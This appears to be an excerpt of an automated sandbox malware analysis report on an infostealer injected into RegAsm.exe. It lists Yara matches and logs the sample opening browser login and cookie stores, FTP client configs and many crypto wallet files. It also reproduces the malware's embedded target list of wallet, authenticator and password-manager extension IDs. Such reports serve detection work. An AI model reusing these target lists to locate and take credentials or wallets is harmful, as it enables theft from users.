Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B0C40 sqlite3_bind_zeroblob, 2_2_6C2B0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B0D60 sqlite3_bind_parameter_name, 2_2_6C2B0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1D8EA0 sqlite3_clear_bindings, 2_2_6C1D8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_6C2B0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1D6410 bind,WSAGetLastError, 2_2_6C1D6410